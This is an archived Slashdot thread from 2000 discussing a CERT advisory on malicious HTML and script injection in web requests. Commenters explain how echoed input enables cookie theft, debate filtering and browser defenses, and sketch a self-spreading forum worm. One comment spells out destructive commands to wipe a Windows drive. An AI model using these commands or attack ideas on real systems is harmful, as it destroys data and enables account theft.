Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
The Internet

CERT Advisory On Malicious HTML Tags 440

Anonymous Coward writes "Cert has published a major advisory on malicious HTML tags embedded in client Web requests. Basically, all clients and all Web servers are affected by this problem. If a Web site does not scrupulously check all input data before posting it back to the user, malicious scripts could be executed over supposedly secure and trusted connections. Recommended solutions include completely overhauling Web sites, disabling cookies and scripts, and 'Web Users Should Not Engage in Promiscuous Browsing.' Sun, Microsoft, and Apache should have notices up on their sites shortly. "
This discussion has been archived. No new comments can be posted.

CERT Advisory On Malicious HTML Tags

Comments Filter:
  • by Anonymous Coward
    One of the nice differences between *nix and M$ is that *nix actually has a real concept of separate user contexts. My browser settings are held in MY directory subject to MY permissions, etc. I can also install/use software in my home directory - root doesn't have to do it (unlike NT which frequently requires administrator access to install user software).

    Therefore...

    Why not isolate browsing? I need to do some research and try some things as this is not a strong area for me but perhaps someone has some comments/ideas on the following possibilities:

    1) Create a separate user (say "surf") and only browse as that user. Give your normal user read access to that user's files but strictly limit surf's power. This would at least limit the possible damage from evil scripts. OK for a one user desktop setup but a problem for multiple users.

    2) Isolate browsing to a specific user subdirectory. Any ideas on how practical this would be? I am guessing that one would have to set up a different user with permissions only to that subdir and browse as that user. Or, could chroot be used to limit the browser's access or would that block too many library/system calls?

    3) Create a /surf/ tree with the browser software and /surf/user directories. Only allow browser access to the surf tree (even chroot?). Each user would have a subdirectory with appropriate permissions for their browser files (saved files, .browsersetup, etc.). A link from the normal home directory to the /surf/user directory could make this fairly transparent to the end user.

    Any other ideas? We should be able to beat this problem at least in the *nix world by limiting the power of the browser.

  • by Anonymous Coward
    My Microsoft Internet browser protects me from bad things like this. I don't think Microsoft would be such a successful company if the allowed hackers to hurt their users. There are a lot of really smart people at Microsoft and I'm sure they have fixed any problem that might happen because of this.

    P.S. I also practice safe computing as Microsoft has told me, it is important to avoid "bad internet zones"!
  • Get it as part of your distribution (the bsd port is "ijb"), or at www.junkbuster.com.

    It works wonderfully. I rarely see blinkies anymore, and there are only two sites than can give me cookies, and a third that can retrieve one that it can't change.
  • When Mozilla becomes a usable browser, this argument becomes valid. Not that I expect this to happen next N years, N>=1.
  • That's what passes nowdays for a new hole? I, far from being security expert, wrote patches for guestbooks on this subject about 3 years ago. It's just obvious you should think about this. Isn't this why I see "allowed HTML" here below?

    Now just what we lack is somebody patenting idea of fixing this "new hole"...
  • <i>The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipping their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn on this stuff. They didn't. Who are you calling irresponsible?</i>

    As an engineer I can say that this isn't always the case. You work to see most of the gotchas of doing something a certain way and even <i>with</i> peer review and countless trials, you can't forsee every consequence.

    Turning everything off by default makes your product harder to use, so you lose customers and therefore sales. (with browsers being free this blurs the line but the effect is the same)

    Making screens popup all the time is annoying to the customer. There are lines to be drawn all over the place. Often they get drawn wrong, but that's often the fault of management, not the guys who actually do it. He who writes your paycheck gets final say. Not everyone is fortunate (or wealthy) enough to walk whenever they can't agree with management on all issues.
  • This advisory basically states that it is potentially possible to do extremely destructive things with HTML, especially given all the extensions.

    I therefore expect the following advisories to be put out:

    2001: The tags added in response to the CERT Advisory on Malicious HTML Tags can be exploited by embedding HXDHTML (Hyper eXtended Dynamic HTML) that can run arbritary code and a coffee maker over a supposedly secure link.

    2002: The tags added in response to the CERT Advisory relating to the CERT Advisory on Malicious HTML Tags can be exploited by embedding sections of Bill Gate's brain, which can execute random fragments of assembly that can result in a Denial of Service attack.

    2003: The tags added in response to the CERT Advisory relating to the CERT Advisory relating to the CERT Advisory on Malicious HTML Tags can be exploited by a child of 3 just by sneezing. NOW WILL YOU STOP ADDING THESE B***** TAGS AND SECURE YOUR PROGRAMS!

  • Yes, that would be correct. I was at work and not thinking right. This shows something though, it's actually REALLY hard to type messages like that because of the &amp;lt; that you have to type to have it show &lt; and don't even get me started on quoting.
  • Disable JavaScript. :) Couldn't be easier...
  • Well, the issue then boils down to who has the right to execute scripts. OK, it might sounds a little strange (and I'm not sure my explanation will clear up things either), so let me try to explain...

    If I have my homepage somewhere in the other-hosts-it-for-me world (say Xoom, or AOL for that matter), and they suddenly decide that "JavaScript is a security risk". They simply modify their server to turn off all JavaScript, and BOOM! My JavaScript breaks, and I have no way to get around it. Are they allowed to do this? Probably, yes. Should we try to stop it? Yes! ;-)

    Anyway, the system you're proposing doesn't fit well into HTML. A tag should be composed of a start-tag and an end-tag, not two empty tags with different attributes. Of course, having a `normal' HTML tag would again lead to security problems. I think the best way to solve this problem is parsing the HTML, and allowing only the tags one wants (like Slashdot does -- I'm sure some useful code could be extracted out of slash 0.9).

    /* Steinar */
  • No, it's not down -- the advisory itself is just so secure, we can't get to it. (I get a 403.)

    /* Steinar */
  • When writing CGI programs with Perl and CGI.pm I use a wrapper for getting URL parameters which will check them to ensure they contain only the characters [a-zA-Z0-9_]. It's not necessary most of the time, but it does help protect against new attacks that might be discovered, like this one.

    In my opinion, strings passed as URL parameters should be human-readable so that the URL makes some sense; if you're passing long chunks of data such as HTML, it's better to do that with a POST request, which you should also validate thoroughly. So it's no great hardship to insist that HTML tags, hidden null bytes and so on aren't allowed in URLs.
  • I don't think this is really newsworthy. Of course you need to scan the user input to make sure it contains only elements in a specifically defined set of elements. You should search for onClick, onMouseOver, on* javascript events, FORM and SCRIPT elements, and anything else that doesn't fit a strictly predefined list of allowable input.

    I thought people knew this stuff. At least slashdot seems to get it right.

    -jwb

  • This is just a demonstration of the fact that this isn't a trivial issue. The above list of tags appears to allow <P onmouseover=somejavascript> through. Now, when I tried it, slashdot didn't accept it, but that is another issue.

    Some browsers (especially IE) allow lots of attributes to lots of tags that you wouldn't normally think of as dangerous.
  • It is very true that not all webservers are impacted by this issue.

    However, just because a company had not released information about their problems doesn't mean they don't have them. In Roxen's case, it has obvious issues, at least with the 404 page on the server at http://www.roxen.com/

    The purpose of this post isn't to point at vendors and laugh, but to drive home the point that far more things are vulnerable than you may think. Apache, IIS, Netscape Enterprise (or whatever it is called now), Zeus, thttpd, WebSitePro... that should cover a majority of sites. Some are less vulnerable (Apache), some more (no names).

    It is also important to remember that the webserver itself is only the smallest part of the issue. If the problem could be fixed by just patching your webserver, it would be nowhere near as big of an issue.
  • you can get and hack your own private copy of Mozilla

    Yes, in theory.

    For some of us, our strengths lie not in writing code, but in identifying valuable features and usable interfaces.

    Those that ignore such talented (albeit different) voices are doomed to live in a world where the majority settles for crap (like windows) because it is at least usuable, even if it isn't elegant or efficient from a technical point of view.

  • Translation 1: I'm too lazy to learn how to do anything -- someone do my work for me.

    I didn't say I (or anyone else) couldn't write code; I said that our strengths lay elsewhere. You must be a true newbie if you've never run across someone who really just wasn't such a great programmer, no matter how hard they tried, or how much they studied.

    And of course, when you want to see a movie, you go film/act/direct/produce it yourself. And you do all your own cooking (you never eat in restaurants since you've yet to find someone who can cook as well as you do.) You don't bother to play any video games other than the ones you developed, since you're the best game designer there is. You write your own novels, too. Naturally, you do all your own auto repairs, and home repairs, and you take your own trash to the dump, and you only listen to music you've written/performed/recorded.

    My, my, aren't we the Heinleinesque ideal?

    Translation 2: I'm best suited for telling others what to do.

    Well, not me personally, but yes, there are those whose strengths lie in managing projects. They know how to motivate people, and can effectively run interference between the people that do the work and those whose job it is to prevent them (upper management). Generally, they aren't what would be called a geek, but the better ones (in the high-tech industries, anyway) are at least technologically aware.

    But of course, you're the ultimate superman, doing everything yourself because your the best person for every job.

    As for me, personally, I've been told that I'm really good at designing usable interfaces and explaining things to the non-technical. So I've done some teaching, a fair bit of tech support, a lot of specs, and quite a bit of coding. (Mind you, I wouldn't bet I was coding before you were born, but it wouldn't surprise me.)

    Oh, no, wait a sec -- I've got a list of nifty ideas for projects right here. As soon as I dig 'em up, I'll expect you to get to work...

    Thanks, but no thanks. I'm currently working way too much, and have a ton of projects of my own, ranging from writing documentation, to rewriting a couple of systems in Java, to finishing a number of web sites, to getting the stupid computer in the bedroom to see the network again, after swapping ethernet cards.

    But sure, e-mail me [mailto] with your list of projects. If any of them have merit, and I can find the time, I'll work on them, and make the money from them. I'm not too proud to think that others may have good ideas (perhaps even better than my own) and put them to use.

    Which leads me to the point I made originally (and that you missed) -- when someone offers a suggestion in an area that is not your area of expertise, take advantage of it.

  • I spent some time last weekend speaking to a person that used to sell a database package with a web interface. I was trying to demonstrate that because the package performed no filtering for HTML code in entered text, a malicious user could essentially do anything, eBayla-style - I demonstrated with an iframe. She was amazed.

    I've been developing stuff for this database package at work for about a year now. It's purely internal. I use this issue to pull off cute stuff in comments fields, like bulleted lists, font colours, bold, etc - just like /. - but I know it's capable of much more. When we make info public we're unfortunately going to have to disallow data entry because of this flaw, or we're going to have to upgrade to another version of the software (and I'm going to have to spend 6 months in hell whacking into brand new problems... )

    BTW: Anyone know if the UBB filters this stuff?

  • When Mozilla becomes a useable browser, this argument becomes valid. Not that I expect this to happen next N years. >>-1.

    Others may have a different opinion.

    (This comment posted with Mozilla M14 nightly build)
  • This just basically points out a basic security flaw in the entire web programming model. As far as I know exploits that take advantage of the vunerabilities described in the advisor have been around for quite some time.

    It is entirely up to the web site to validate the data entry of its users. Unfortunately you cannot trust every web site you use to catch every possible exploit. If you are worried about it, disable JavaScript/VBScript.

    To fix this problem would require some enforced CGI-coding standards or certification programs for web sites - "We use only Web-Guard 2.0 certified server side scripting tools to keep you safe from script kiddies!"

    -josh
  • There's no reason why anyone should be remotely alarmed by this. If you have any decent security in your website, then you filter everything between code here(-- did they appear?). As for adding that crap to a link, anyone who knows what a QUERY_STRING is, knows that this can be done. So in all reality, there's nothing remotely alarming here. If there were good browser security on the client side to begin with, then this wouldn't be an issue at all.
  • Actually, that isn't too hard, on either Linux or Windows 9x (haven't tried it on NT or 2000). Under Linux, pop open your /etc/hosts file and make an entry for each site at 127.0.0.1. All those requests will get sent right back to you, at which point they die the death.

    Same thing under Windows, except the file is C:\Windows\hosts. (There's a sample file located at C:\Windows\hosts.sam. Rename it to get it to work).

    If you're using Internet Explorer, you can use custom "security zones" to assign arbitrary permissions to pages. I don't think you can use it to block a site entirely, but you can disable cookies, java, javascript, activeX, yada yada.

    Finally, any proxy server or firewall worth its salt will allow you to restrict access to certain web sites.
  • "This one really took me by surprise as a web developer."

    Not much of a web developer are you? :-)


    I knew someone would have that reaction.

    let me clarify: I build web sites. I design pages, write HTML and do wonderful things like that. I don't build databases, enact security measures, or enable filtering or processing of form input. I'm not at all involved in developing the format of URLs or the formats in which we accept data. I build web sites, not networks or security protocols.

    That said, as a "web developer", I'm perfectly aware of what CERT says:

    When client-to-client communications are mediated by a server, site developers explicitly recognize that data input is untrustworthy when it is presented to other users. Most discussion group servers either will not accept such input or will encode/filter it before sending anything to other readers.

    And I doubt, as they do, that many people do no processing whatsoever on public data. the issue at hand is what happens to private data, which CERT seems to think (and I tend to agree with them) not so many developers get concerned about.

    I can certainly think of situations (like, say, a free web hosting service or web-based email) where having HTML more complex than bold, italic, etc would be desired as input.
  • Assuming you meant s/&lt;(\/){0,1}\s*b\s*&gt;/<$1b>/gi so that the tags are properly closed, then &lt;b&gt; becomes <b>. How can I type a b between angle-brackets then?

    Nitpicks aside, you're right. Most people have been handling crap like that since Netscape thought up <BLINK>

  • > Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely

    Yeah...disables exactly the parts I want disabled, which is why I turned off Javascript about a year before the CERT advisory.

    --
    It's October 6th. Where's W2K? Over the horizon again, eh?
  • Sure, telling lynx to represent itself as a browser capable of keen graphics effects, or telling Netscape 3 to identify itself as something capable of DHTML, etc, is silly, and you deserve the messy page you get. But, telling a browser to identify itself as any other browser, and to behave like it if possible, makes sense. I can do it, with Junkbuster, if I wish, but I usually leave it transparent, because any IE only page isn't a page I'll ever visit.

    You could have a IE5 filter on Mozilla that would take a page and render it like IE5, complete with whatever bugs. That would be funky. And add filters for all main browsers, so a web designer could check behavior in many browsers without having them all installed.

  • How would that be hard? Just get the browser to substitute their ActiveX control for a similar one set to return a random number. It might also be possible to trap these opcodes, so that a system util could return any specified number to any program which asked, unless that program was run at OS level (which not much is, ideally.)

    Anyways, you control your machine and the software on it, spoofing an ID number isn't hard.

    You could do it by trapping the ID check request.

    You could do it by subverting the applet that checks.

    You could do it by watching outgoing packets to the intel site and replacing the ID with a fake one.

    etc.
  • Perhaps this would work best as a browser addon, where you (for instance) install Junkbuster the pluggin, and it modifies a few browser menus and displays, and does this. The browser could pass all request, incoming html, etc, through specific filters, so any program that wanted could fit as a filter, saving you from having to install a proxy for what is really just a filtering job.
  • You're right, of course, that this is a weakness of JavaScript, not SlashDot. And that it's similar to a plain link to a malicious site. But there are a couple of other factors:

    1. If a malicious link were posted on your site, I would be able to take some kind of action against you.

    2. I may have told my browser to "trust" slashdot, but not your site.
  • Oh, it's a fake article. We geezers can tell. Some text vandal with nothing better to do.
  • This really depends on a number of points
    a) Coding skill
    b) The time you have
    c) Whether or not you can get a working copy of Moz to compile on your machine - I've never managed it and I've been trying regularly since March 99
  • Simply, the proposal is this. The server itself should *optionally* scan for and block any potentially malicious code in GET or POST requests, before they're passed to the handler. Yes, this would eliminate a large number of potentially useful uses of scripting, but a server administrator who had turned on this option would know that the site was secured against such attacks, rather than the security being up to *every* cgi script on the machine.

    There could even be several levels of such scanning, for instance blocking all html tags in client requests, or only a subset of such tags, or no blocking.

    Admittedly this isn't an ideal solution, but personally, for the sites I run, I'd love to be able to turn on this option which would block all tags. I could still get a customer's name and billing info without needing any HTML tags in the input. Yes, I'd be working under a more limited subset of the possible functionality, but the added security would be worth it, and that choice should be available as a configuration option.

  • Even if /. filtered that out of the link, you could still do it on the other side of a plain HTML link.

    There is no way /. could protect you from running arbitrary Javascript if you click on a link, except preventing posters from linking to arbitrary locations.

    However, since /. works just fine with Javascript off, it's you can defend against it just fine by turning Javascript off while surfing /.

    I don't think this is a weakness of /. but an inherent weakness of Javascript-enabled browsers.
  • Jeez man, that beats them all so far!

    Mod this up someone!

    (In case it doesn't work on your machine : it pops up an alert as soon as this page loads. Works on latest Netscape release)
  • How about this one
  • Sorry, I didn't mean for my post to come across as "my server is better than your server" - I was just pointing out the error is assuming that because the "big three" were listed as vulnerable, that all webserver are vulnerable. And yes, I agree that just because someone doesn't respond that they're not vulnerable - but the CERT document doesn't say that Roxen WAS contacted (in fact, it doesn't say anything about them at all.) Now, I may have an incomplete understanding of the problem, but it seems to stem from websites allowing people to post HTML tags in guestbooks and such.. so if the webserver strips out all HTML tags, how does "a simple server patch" not solve the problem? As I said, if the server by default dequotes all HTML (and RXML, and MySQL) tags, how can you say that the server is still affected?
  • I tried this out (with my own CGI targeted) and by golly it works -- it steals my slashdot cookie and puts it in the log.


    I tried this out with some other sites I have cookies in and the script doesn't execute.

    Any references on how this peculiar URL syntax works so I can figure why if I replace "www.slashdto.org/notthere" with "mydomain.com/notthere" it doesn't redirect?

  • Does it really?

    It shouldn't work; if it does, this would be really bad.

    The script doesn't get executed until the 404 page is sent back from the slashdot server with the offending URL mis-encoded (The &ltscript> string shouldn't become a script tag, it should become &ltscript>
  • Gotcha. I was initially stymied by the fact that the "URL" wasn't a valid w3c URL; now I see that the server as to cooperate in sending the offending script back to the user.

    I've been testing this out on my freethreads based discussion group with embedded HTML turned on. Using your example as a starting point I have successfully stolen some of my users' cookies using this method. Certainly the method could readily be improved (if you can call it that) by making it stealthier, but I've proven that I could in principle be affected by embedded scripts.

    You have to fuss a bit so that the forms processing stuff doesn't insert tags into the script (like &ltBR>). Since the 404 page is properly encoded on my server, I probably an get by with turning off HTML (freethreads has its own simplified "markup" language which is still a problem as far as links are concerned).

    So, I'm wondering. The scenario I've set up allows a malicious user who has access to my site to steal cookies from other valid users of my site. Since I don't have the 404 encoding problem, is there a way that users could have their cookies from my site stolen while viewing content on a third party server? Thus far it seems that the exploit requires that the browser get the malicious script sent back to it by the targeted (e.g. my) server.

    Thus far, it looks like the extent of exposure of my site's protected contents is to people who have the ability to upload HTML tags onto it. Not a good thing, but not too bad either. Do you think this is right?

  • <SARCASM >
    You're right, it was down right irresponsible of CERT to put security ahead of making mouseovers work. What's worse, those mouseovers represent "a vast part of the web's functionality." And now we don't have them. Thanks a lot CERT!
    </SARCASM>

    How about:

    * Thanks a lot, sloppy CGI coders, for failing to validate and filter *all* input!

    * Thanks a lot browser vendors, for failing to allow people choice in their browsing. Heaven forbid that I be allowed to choose which JavaScript executes on my broweser -- it's either all or none!
  • >anyone who knows what a QUERY_STRING is

    Aye, there's the rub. This may seem like "common knowledge" to you or to the many other web-wankers out there, but in fact neither the typical user nor most kinds of computer specialists outside of your narrow little specialty know (or should know, or should have to care) what a QUERY_STRING is. In fact, I'll bet a large number of web-wankers, unschooled as you lot tend to be before you start proclaiming yourselves gurus, don't know what a QUERY_STRING is either because you never see one behind the layers of cruft in a web "authoring" tool someone with marginally more talent than you provided.

    And that is more than "remotely alarming". The real issue is that idiots can and do create web pages, so we need something that's safe to use even when those idiots are involved.
  • Hey everyone - follow this [slashdot.org] link!

    I tried to get it working on the new-user sign up page (where you might actually get someone's password), but the html is parsed out there (good work).

    http://net.bruno.net/ [bruno.net] (only malicious for the mind)
  • Perfecto Technologies [perfectotech.com] has a really good solution to this problem with their App Sheild. It checks forms on the way out and then checks the data coming back to make sure it fits what it expected. I've seen this done as a home grown solution at a Euro telco and it seems to work very well.

  • The problem with this is that a lot of links these days are really (hundreds of characters sometimes) long, the browsers I know display the target left-justified, so I often can't see whole link without doing some painful stuff.

    Plus, I might have a good idea what to look for, but the vast majority of folks wouldn't know a scriptlet from a rubber duck. How does this sort of advice help my parents? A ten minute talk about 'trust' will do a lot more for them.


    EZ
    -'Press Ctrl-Alt-Del to log in..'
  • Imagine the damage that CNN troll could do with this.
  • I'm using IE (at work). The command "returntrue" is an error. Are the spaces getting stripped or something?
  • You could write a /. troll virus! It would post it's self as a link which submited a post contining it's self as a link when you clicked on the link. Would be very nasty. Lucky most of the /. trolls seem to have a sence of nobility and post silly stories instead of nasty things.

    Also, it will not be to hard for Rob and eam to fix this hole in /. by having the submit button investigate things that web browsers interpret diffrently (and not just HTML tags). I just hope Rob sees my warning about the possbility of a /. troll virus.

    Jeff

    BTW> You would need javascript to make a troll virus with an unlimited life span, but you would not need javascript to make a troll virus which only lived for a limited number of reproductions, so it might also be a good idea for /. to refuse posts which are submitted using the GET method.
  • Unless I'm missing something, the only real danger is from malicious code included in the QUERY_STRING (the part of the URL after the ? mark, in case anybody here doesn't know that). If that is the case, then we have a single point of entry to secure -- nothing else is necessary if we ensure that the QUERY_STRING doesn't include anything it shouldn't. (Or, to look at it another way, if we ensure that it only includes what it should.)

    Please correct me if I'm wrong, but please understand the advisory first! (Too many of the comments here have shown a lack of understanding, assuming it was the "protect user B from user A" issue.)

  • "How much can you really do with some "evil" Javascript?"

    A friend of mine visited a hacked sites archive on an IE5 machine (windows 98 SE), and it executed some funky javascript program and it caused a lot of memory errors (I think, I am not a good programmer) and other funny stuff.

    "Probably the most is to close the window or send a bunch of popups.
    This is not exactly formatting your hard drive. "

    Yes, yes it is. Given the amount of times a windows machine might be rebooted, it's easy to alter the Autoexec.bat file to say something like this

    deltree /y c:\windows

    and then

    format /q c:

    I've seen it done, and another friend, visiting the same archive site, but a different page, got majorly screwed because of javascript opening a file on disk and changing the contents (or just creating a file, overwriting the old one).

    http://www.2600.com has the site, I beleive, that both of them went to. So, when I went there on my linux box, I was unafraid. :-) Well, kinda. I mean, it is their fault, they said "Dangerous for windows users" right there next to the link.

    So, on my windows box, I made the autoexec and config files read-only. I don't know if it'll work, given windows ability to just override that kind of thing. I don't visit those sites.

    later
  • I don't know exactly how Amazon's one-click works, but I'm pretty sure it can't have the problem you are describing. When you turn on Amazon's one-click, they give you a cookie to identify you. When you have this cookie, you get the one-click link on all of their product pages. When you click on the one-click link, the server processes the link and also can check to see that you have the cookie and that the identities match. So you could send the one-click link to someone else, but if they clicked on it, they wouldn't have the cookie identifying themselves as you.

    And even if someone was trying to be malicious and somehow sniffed your traffic and got the cookie amazon gave you when you turned on one-click and somehow put it in their own browser, and then in their browser when to your URL to one-click buy something, they wouldn't get the product for themselves. They would just be buying the product for you with your credit card since the shipping address and billing info is associated with the one click. And it's possible Amazon has some other security measures that even make that scenario impossible.

    Oh, and referres can be faked, so they are hardly security precautions. But it's possible they do something like send something in plaintext and encrypted and then decrypt the ciphertext and make sure it matches the plaintext.
  • Let me demonstrate this by posting the link that I created. If example.com supported this script, and "malicious code" were actually malicious, clicking on this link would screw you. :-)

    Click Here [example.com]

  • Well, I did this to kill whitepower.com's guestbook like, a year or 2 ago.

    Again, I think that this kind of problem indicates that the web programmers are totally amature. I mean, you DO NOT TRUST THE USER. heh if you do, you're just asking for trouble. I'm not saying that I'm a good programmer or a very experienced one - its just common sense.

    The most obvious and common screw up of this sort, is when someone tries to include some html tags in a dynamic post - like and they forget to close it - you see it all the time - the rest of the page starts blinking. The best way that I've found to fix this, is replace all tags with &gt and &lt and then specifically re-enable particular tags like
    and and check that there are closing tags. That way you get fewer problems.

    But again, I think that there needs to be some kind of checklist of key points to remmeber and check when developing apps - simple stuff like, "dont ever interpret code that a user could have a part in creating" or "dont trust the user to get it right" "dont trust that the user is friendly" stuff like that - and as i said im not very experienced, so im sure that there are a lot more helpful points that someone could supply. :)
  • CERT seems to be stating the obvious here. And I'm glad. People need this rammed into their heads: if you want security, separate CODE and DATA. Once these are separated, you can begin to selectively allow trusted places to include code with the data.

    I have selective way of enabling Javascript for trusted sites in Opera or Netscape, but Mozilla could add this much needed feature -- allowing me to run without Javascript, unless it's needed for something. Security is increased in this way.

    Netscape's horrible 4.x browser seems to require Javascript for CSS to work at all, though, so you have to settle for disabling Java, and forcing it to use a Junkbuster proxy (nukes cookies except for the exceptions), and another for script escaping.

    Web boards, AFAIK, espcape all content by default. This is fine, as escaped content comes out as visible data, and not as possible malicous code. The various exploits only seem to affect sloppyily programmed webboards (ie: not Phorum [phorum.org], it's secure).

    Maybe someday we'll be allowed one click "trust for js" "trust for cookies" "trust for java" etc... As they are all executable code or, in the case of cookies, serial numbers allowing tracking (think doubleclick.net). CSS1 and HTML4 are perfectly secure by themselves -- remember that. Opera runs fine in "HTML & CSS only" mode.
    ---
  • Drat, now i can't post my javascript to uninstall windows and reinstall linux on an unsuspecting persons hard drive to slashdot. That would be a wonderful way to perform software updates! When the new version of Importantsoft comes out, you email every one of your (l)users a bit of 'sploit code and you never have to get off your butt. !
  • In Navigator you can stop animations once the page is loaded, using the ESC key.
    Sometimes. Often I find that they start right back up again. If I was proficient with the junkbuster [junkbusters.com] configuration files, I'd immediately add any animation that did that into my killfile.
  • by Anonymous Coward on Wednesday February 02, 2000 @11:51AM (#1310802)
    Why is it doing this!!! How does it know my Visa number!!! Damn you cmdr taco!!!
  • by Anonymous Coward on Wednesday February 02, 2000 @10:48AM (#1310803)
    Another important option: no changing status bar messages. By using an ONMOUSEOVER event to change the status bar message, you can make it look like a link is harmless. The status bar may show "http://www.slashdot.org/" when the real link is "javascript:evilcode".
  • by GeorgeH ( 5469 ) on Wednesday February 02, 2000 @10:04AM (#1310804) Homepage Journal
    Does not engaging in promiscuous browsing mean that I can't use Dug Song's Webspy [monkey.org] program? Or does it mean that I should just stop looking at all this pr0n? I'm so confused.
    --
  • by Marc Slemko ( 6200 ) on Wednesday February 02, 2000 @01:02PM (#1310805)
    Yes, it does work. There are cases where it doesn't work and various special circumstances that are sometimes needed to make it work, but it does work in a broad range of situations.

    This is what the advisory is about and the essence of what the new issue is. It is the impact of this that hasn't been well understood before. The advisory isn't explicit about the details because that's just the way it is written, and the issue is very broad. But if you read it and understand what it is saying, it does include all the necessary concepts.

    Suppose you want to exploit site A. What you have to do is find a page on site A that can echo back some part of the request unencoded and unfiltered. Then you send a user to that page. When they get the javascript back to them, their browser sees it as coming from site A and executes it. From there, you can control the user's interactions with the site however you want. Stealing cookies is only the most obvious way; the only reason this makes a reqest off to printenv on another server is to send the cookies out and show people they are being sent, in a URL encoded twice format.

    If you wanted to apply this to Amazon, you could. However, you would have to find a different request to make. For example, on slashdot the 404 page doesn't properly encode its output. On amazon there are other pages that have the same problem. The site specific part is finding a page on the site (any page) that you can use.

    For those that say "well, just don't click on any links with script tags in them", that doesn't change anything. I could send you to a page that redirects you there. I could do an onmouseover attribute to make you not see it. etc.

    It also isn't hard to get many users to go to the URL you specify via other means, such as HTML email with the right stuff in.
  • by Marc Slemko ( 6200 ) on Wednesday February 02, 2000 @11:06AM (#1310806)
    There are issues here that have not been widely known before. The issues that have been known for a long time are that if user A submits content for user B to view, it has to be properly encoded. This advisory shows that even if user A submits content that only user A views, it can still pose a security problem. Even worse, encoding things properly is a very difficult task, especially when alternate character sets are concerned.

    Many many many sites are vulnerable to this. yahoo, ebay, various Microsoft sites, amazon, etc. The list goes on. Slashdot is vulnerable.

    I like to think I know what I'm doing around the web, and I certainly had trouble figuring out all the ins and outs of how things have to be encoded in particular situations. I still don't think they are all figured out.

    The real issues here are a lot more subtle than they may appear at first. While the basic components of the issue aren't anything new, and no one familiar with the technologies should be suprised to hear that this issue exists (even without being aware of the details beforehand), they have never been publicly put together in this manner.

    Also note that this isn't just about script tags; you can insert other HTML that can be just as dangerous.
  • by deusx ( 8442 ) on Wednesday February 02, 2000 @01:05PM (#1310807) Homepage
    Try Bookmarkets.com [bookmarklets.com], because believe it or not, this has all been done before and it's actully pretty useful.

    Note-- Javascript laden links ahead: (None are malicious)

    You can do things like this executive dice roller.

    Or, read your cookie that was set for this site. How about seeing when this page was last modified?

    See a word over 2 syllables you don't know on Slashdot? Search at Dictionary.com.

    Do a reverse lookup on someone's phone number.
  • by Bernal KC ( 10943 ) on Wednesday February 02, 2000 @10:34AM (#1310808) Homepage
    I would settle for making the Jscript on/off switch more accessible. I toggle it on and off frequently -- but it is way more difficult than it ought to be. Espcieally with IE.

    Has anyone rolled an app/applet that makes it easier to toggle Jscript?

    [I'd also love to have another utility to clear my Win Documents menu.]

  • by Roofus ( 15591 ) on Wednesday February 02, 2000 @10:14AM (#1310809) Homepage

    Basically, check the link before you click it. Look for any sign of an ebmedded evil script in the ?variable=badstuff.


    Of course, if the method is post, you really can't see it then.

    Also, check all forms to make sure that the submit button is taking you to where you think it will.

    These tricks are nothing new. And after it all, I probally won't change my browsing habits.

  • by Lumpish Scholar ( 17107 ) on Wednesday February 02, 2000 @03:04PM (#1310810) Homepage Journal
    ... but IE 5.0 does a pretty good job of handling this for expert users only.

    IE divides the universe into four "zones": "Internet" (the default), "Trusted sites", "Restricted sites", and "Local intranet". (An explanation of the last would be really complicated.)

    It's possible -- but not easy -- to designate certainly sites (e.g., *.yahoo.com) as trusted, with one set of policies for cookies and "active content" (Javascript and Active X), another set (e.g., *.doubleclick.net) with a much more restrictive policy, and the Internet (default) zone with fairly paranoid policies.

    On the system I'm most paranoid about (the laptop I use for e-mail), every attempt to send persistent cookies or run Javascript is flagged, and permitted only if I say it is. (Hint: Slashdot runs just fine thank you without Javascript.) It's a pain in the tush, but scary enough to keep me at it.

    I can deal with this. My mother couldn't. --PSRC
  • by CaptainSuperBoy ( 17170 ) on Wednesday February 02, 2000 @10:03AM (#1310811) Homepage Journal
    Applause to the CERT for speaking out on this issue.. however as a developer of web applications I'll say that this has always been a factor. Any time you take information from a user and serve it back, your site / users are at risk of being abused. It doesn't matter if you serve it back to everyone, or only the user who submitted the information.

    Consider Slashdot, for example.. you'll notice that it says Allowed HTML and has a list of permitted tags when you are posting. This is so that you don't do anything funny with javascript, forms, or even the blink tag (yuk).. any site that accepts input like this needs to scan for possible malicious tags.

    One more concern I've seen is generic error message pages, where the error message is passed in using a GET type encoding on the URL line. This is so that admins don't have to make multiple pages for "password incorrect", "no username", "our database is down/broken", etc.. however a user can just change the error message that is passed in and possible include malicious tags in this. I'd recommend using error codes instead, that map to hard-coded error messages.

  • I blame mobile code for this fiasco. My precise definition of "mobile code" is "code that crosses a trust barrier". Thus examples of things that are mobile code include:

    • Java and Javascript applets
    • Macros attached to MS Office documents
    • ActiveX "controls"
    • "Foreign" active network applets running on "my" routers
    • E-mail attached .exe files
    Examples of things that are not mobile code include:

    • computational functions migrating around a distributed cluster
    • agents migrating around a LAN or a distributed virtual LAN
    • vendor-supplied upgrades to a system
    • duly authorized installation of new software
    • Java applications that were explicitly installed to add functionality
    By these definitions, I argue that mobile code presents far more threat than benefit. The "weak beneift" argument is that most of the benefit provided by mobile code comes in the form of dynamically interactive applets. The applets provide finer-grained interactivity with the user. This is strictly an ease-of-use issue, as the server must check everything that the appliet produces. The only applications where this actually matters is games, and people who give up security for gaming get what they deserver :-) Less flippantly, game applets are easy to effectively sandbox by giving them absolutely zero access to the client workstation.

    The "major hazard" part comes from the difficulty of effectively confining an untrusted applet such that it gets controlled access to the client host workstation. The more complex the semantics of interpreting downloaded information, the more difficult it is to establish whether it is safe (cf recent discussion on firewall-wizards about whether CheckPoint FW1 is effectively stripping dangerous tags from HTML content). The more powerful the semantics of the downloaded information, the more able the adversary is to build attacks that escape static analysis by computing the actual attack code on the fly.

    I think that powerful tools are required to enable administrators to enforce a ban on active content. These tools might include:

    • a filter that can strip macros from MS Office documents
    • firewalls and browsers that detect active content (Java, Javascript, ActiveX, MS Office macros, etc.) and send back an e-mail to postmaster@originating.site explaining that their active content has been stripped, and they had best prepare documents and web pages that work without the active content.
    That last tool is an especially powerful thing that the open source community can do to try to smarten up giddy web developers who think that every new feature to come along is just so cool that it must be used. To make the web safe to surf, we need to push back against the goobers who ware re-defining HTML to require scripting to make a site usable.
  • by Sabotage ( 21481 ) on Wednesday February 02, 2000 @10:54AM (#1310813)
    I think the original poster was trying to say something a bit different.

